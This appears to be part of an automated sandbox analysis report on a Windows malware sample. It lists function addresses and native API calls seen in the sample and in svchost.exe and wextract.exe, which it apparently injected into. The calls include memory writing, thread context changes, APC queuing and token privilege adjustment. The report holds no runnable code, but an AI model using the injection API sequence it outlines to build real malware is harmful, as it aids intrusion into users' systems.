Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C00 NtQueryInformationProcess,	2_2_03272C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C60 NtCreateKey,	2_2_03272C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272C70 NtFreeVirtualMemory,	2_2_03272C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272CA0 NtQueryInformationToken,	2_2_03272CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272CF0 NtOpenProcess,	2_2_03272CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03272CC0 NtQueryVirtualMemory,	2_2_03272CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273010 NtOpenDirectoryObject,	2_2_03273010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273090 NtSetValueKey,	2_2_03273090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032739B0 NtGetContextThread,	2_2_032739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273D10 NtOpenProcessToken,	2_2_03273D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03273D70 NtOpenThread,	2_2_03273D70
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D04650 NtSuspendThread,LdrInitializeThunk,	13_2_04D04650
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D04340 NtSetContextThread,LdrInitializeThunk,	13_2_04D04340
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02CA0 NtQueryInformationToken,LdrInitializeThunk,	13_2_04D02CA0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02C70 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_04D02C70
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02C60 NtCreateKey,LdrInitializeThunk,	13_2_04D02C60
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02DD0 NtDelayExecution,LdrInitializeThunk,	13_2_04D02DD0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02DF0 NtQuerySystemInformation,LdrInitializeThunk,	13_2_04D02DF0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02D10 NtMapViewOfSection,LdrInitializeThunk,	13_2_04D02D10
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02D30 NtUnmapViewOfSection,LdrInitializeThunk,	13_2_04D02D30
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02EE0 NtQueueApcThread,LdrInitializeThunk,	13_2_04D02EE0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02E80 NtReadVirtualMemory,LdrInitializeThunk,	13_2_04D02E80
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02FE0 NtCreateFile,LdrInitializeThunk,	13_2_04D02FE0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02FB0 NtResumeThread,LdrInitializeThunk,	13_2_04D02FB0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02F30 NtCreateSection,LdrInitializeThunk,	13_2_04D02F30
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02AD0 NtReadFile,LdrInitializeThunk,	13_2_04D02AD0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02AF0 NtWriteFile,LdrInitializeThunk,	13_2_04D02AF0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	13_2_04D02BF0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02BE0 NtQueryValueKey,LdrInitializeThunk,	13_2_04D02BE0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02BA0 NtEnumerateValueKey,LdrInitializeThunk,	13_2_04D02BA0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02B60 NtClose,LdrInitializeThunk,	13_2_04D02B60
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D035C0 NtCreateMutant,LdrInitializeThunk,	13_2_04D035C0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D039B0 NtGetContextThread,LdrInitializeThunk,	13_2_04D039B0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02CC0 NtQueryVirtualMemory,	13_2_04D02CC0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02CF0 NtOpenProcess,	13_2_04D02CF0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02C00 NtQueryInformationProcess,	13_2_04D02C00
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02DB0 NtEnumerateKey,	13_2_04D02DB0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02D00 NtSetInformationFile,	13_2_04D02D00
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02EA0 NtAdjustPrivilegesToken,	13_2_04D02EA0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02E30 NtWriteVirtualMemory,	13_2_04D02E30
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02F90 NtProtectVirtualMemory,	13_2_04D02F90
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02FA0 NtQuerySection,	13_2_04D02FA0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02F60 NtCreateProcessEx,	13_2_04D02F60
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02AB0 NtWaitForSingleObject,	13_2_04D02AB0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D02B80 NtQueryInformationFile,	13_2_04D02B80
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D03090 NtSetValueKey,	13_2_04D03090
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D03010 NtOpenDirectoryObject,	13_2_04D03010
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D03D70 NtOpenThread,	13_2_04D03D70
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D03D10 NtOpenProcessToken,	13_2_04D03D10
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CE8B20 NtCreateFile,	13_2_02CE8B20
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CE8E20 NtClose,	13_2_02CE8E20
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CE8F80 NtAllocateVirtualMemory,	13_2_02CE8F80
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CE8C90 NtReadFile,	13_2_02CE8C90
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_02CE8D80 NtDeleteFile,	13_2_02CE8D80

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00431BE8

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,74FB5590,74FB7ED0,CreateProcessAsUserW,74FB5030,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,74FB7F30,

0_2_00446313

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe

Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,

0_2_004333BE

Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_004096A0	0_2_004096A0
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0042200C	0_2_0042200C
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0041A217	0_2_0041A217
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00412216	0_2_00412216
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0042435D	0_2_0042435D
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_004033C0	0_2_004033C0
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0044F430	0_2_0044F430
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_004125E8	0_2_004125E8
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0044663B	0_2_0044663B
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00413801	0_2_00413801
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0042096F	0_2_0042096F
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_004129D0	0_2_004129D0
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_004119E3	0_2_004119E3
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0041C9AE	0_2_0041C9AE
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0047EA6F	0_2_0047EA6F
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0040FA10	0_2_0040FA10
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0044EB5F	0_2_0044EB5F
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00423C81	0_2_00423C81
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00411E78	0_2_00411E78
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00442E0C	0_2_00442E0C
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00420EC0	0_2_00420EC0
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_0044CF17	0_2_0044CF17
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_00444FD2	0_2_00444FD2
Source: C:\Users\user\Desktop\oLCnCWQDhK.exe	Code function: 0_2_04182640	0_2_04182640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_006A7FA3	2_2_006A7FA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00691000	2_2_00691000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0069F813	2_2_0069F813
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_006911E0	2_2_006911E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_006919E0	2_2_006919E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_006929C0	2_2_006929C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_006919DA	2_2_006919DA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_006A618E	2_2_006A618E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_006A6193	2_2_006A6193
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00692220	2_2_00692220
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0069FA33	2_2_0069FA33
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00692216	2_2_00692216
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0069DAAB	2_2_0069DAAB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0069DAB3	2_2_0069DAB3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0069DBFB	2_2_0069DBFB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_006923D0	2_2_006923D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00692CC0	2_2_00692CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_006BE623	2_2_006BE623
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00692F70	2_2_00692F70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA352	2_2_032FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033003E6	2_2_033003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C02C0	2_2_032C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230100	2_2_03230100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C8158	2_2_032C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F41A2	2_2_032F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033001AA	2_2_033001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F81CC	2_2_032F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03264750	2_2_03264750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323C7C0	2_2_0323C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325C6E0	2_2_0325C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240535	2_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03300591	2_2_03300591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E4420	2_2_032E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F2446	2_2_032F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EE4F6	2_2_032EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FAB40	2_2_032FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F6BD7	2_2_032F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323EA80	2_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03256962	2_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032429A0	2_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330A9A6	2_2_0330A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324A840	2_2_0324A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03242840	2_2_03242840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032268B8	2_2_032268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E8F0	2_2_0326E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03282F28	2_2_03282F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260F30	2_2_03260F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E2F30	2_2_032E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B4F40	2_2_032B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032BEFA0	2_2_032BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324CFE0	2_2_0324CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232FC8	2_2_03232FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FEE26	2_2_032FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240E59	2_2_03240E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03252E90	2_2_03252E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FCE93	2_2_032FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FEEDB	2_2_032FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324AD00	2_2_0324AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DCD1F	2_2_032DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03258DBF	2_2_03258DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323ADE0	2_2_0323ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240C00	2_2_03240C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0CB5	2_2_032E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230CF2	2_2_03230CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F132D	2_2_032F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322D34C	2_2_0322D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0328739A	2_2_0328739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032452A0	2_2_032452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E12ED	2_2_032E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325B2C0	2_2_0325B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327516C	2_2_0327516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322F172	2_2_0322F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0330B16B	2_2_0330B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324B1B0	2_2_0324B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F70E9	2_2_032F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF0E0	2_2_032FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EF0CC	2_2_032EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032470C0	2_2_032470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF7B0	2_2_032FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03285630	2_2_03285630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F16CC	2_2_032F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F7571	2_2_032F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DD5B0	2_2_032DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033095C3	2_2_033095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FF43F	2_2_032FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03231460	2_2_03231460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFB76	2_2_032FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325FB80	2_2_0325FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B5BF0	2_2_032B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0327DBF9	2_2_0327DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B3A6C	2_2_032B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFA49	2_2_032FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F7A46	2_2_032F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DDAAC	2_2_032DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03285AA0	2_2_03285AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E1AA3	2_2_032E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EDAC6	2_2_032EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D5910	2_2_032D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03249950	2_2_03249950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325B950	2_2_0325B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AD800	2_2_032AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032438E0	2_2_032438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFF09	2_2_032FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFFB1	2_2_032FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03241F92	2_2_03241F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03203FD2	2_2_03203FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03203FD5	2_2_03203FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03249EB0	2_2_03249EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F7D73	2_2_032F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03243D40	2_2_03243D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F1D5A	2_2_032F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325FDC0	2_2_0325FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B9C32	2_2_032B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FFCF2	2_2_032FFCF2
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D7E4F6	13_2_04D7E4F6
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D82446	13_2_04D82446
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D74420	13_2_04D74420
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D90591	13_2_04D90591
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CD0535	13_2_04CD0535
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CEC6E0	13_2_04CEC6E0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CCC7C0	13_2_04CCC7C0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CF4750	13_2_04CF4750
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CD0770	13_2_04CD0770
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D62000	13_2_04D62000
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D881CC	13_2_04D881CC
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D901AA	13_2_04D901AA
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D841A2	13_2_04D841A2
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D58158	13_2_04D58158
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CC0100	13_2_04CC0100
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D6A118	13_2_04D6A118
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D502C0	13_2_04D502C0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D70274	13_2_04D70274
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CDE3F0	13_2_04CDE3F0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D903E6	13_2_04D903E6
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D8A352	13_2_04D8A352
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CC0CF2	13_2_04CC0CF2
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D70CB5	13_2_04D70CB5
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CD0C00	13_2_04CD0C00
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CCADE0	13_2_04CCADE0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CE8DBF	13_2_04CE8DBF
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D6CD1F	13_2_04D6CD1F
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CDAD00	13_2_04CDAD00
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D8EEDB	13_2_04D8EEDB
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D8CE93	13_2_04D8CE93
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CE2E90	13_2_04CE2E90
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CD0E59	13_2_04CD0E59
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D8EE26	13_2_04D8EE26
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CC2FC8	13_2_04CC2FC8
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CDCFE0	13_2_04CDCFE0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D4EFA0	13_2_04D4EFA0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D44F40	13_2_04D44F40
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D72F30	13_2_04D72F30
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D12F28	13_2_04D12F28
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CF0F30	13_2_04CF0F30
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CFE8F0	13_2_04CFE8F0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CB68B8	13_2_04CB68B8
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CD2840	13_2_04CD2840
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CDA840	13_2_04CDA840
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CD29A0	13_2_04CD29A0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D9A9A6	13_2_04D9A9A6
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CE6962	13_2_04CE6962
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CCEA80	13_2_04CCEA80
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D86BD7	13_2_04D86BD7
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D8AB40	13_2_04D8AB40
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CC1460	13_2_04CC1460
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D8F43F	13_2_04D8F43F
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D6D5B0	13_2_04D6D5B0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D87571	13_2_04D87571
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D816CC	13_2_04D816CC
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D8F7B0	13_2_04D8F7B0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CD70C0	13_2_04CD70C0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D7F0CC	13_2_04D7F0CC
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D870E9	13_2_04D870E9
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D8F0E0	13_2_04D8F0E0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CDB1B0	13_2_04CDB1B0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D9B16B	13_2_04D9B16B
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CBF172	13_2_04CBF172
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D0516C	13_2_04D0516C
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CEB2C0	13_2_04CEB2C0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D712ED	13_2_04D712ED
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CD52A0	13_2_04CD52A0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D1739A	13_2_04D1739A
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CBD34C	13_2_04CBD34C
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D8132D	13_2_04D8132D
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D8FCF2	13_2_04D8FCF2
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D49C32	13_2_04D49C32
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CEFDC0	13_2_04CEFDC0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D81D5A	13_2_04D81D5A
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CD3D40	13_2_04CD3D40
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04D87D73	13_2_04D87D73
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CD9EB0	13_2_04CD9EB0
Source: C:\Windows\SysWOW64\wextract.exe	Code function: 13_2_04CD1F92	13_2_04CD1F92
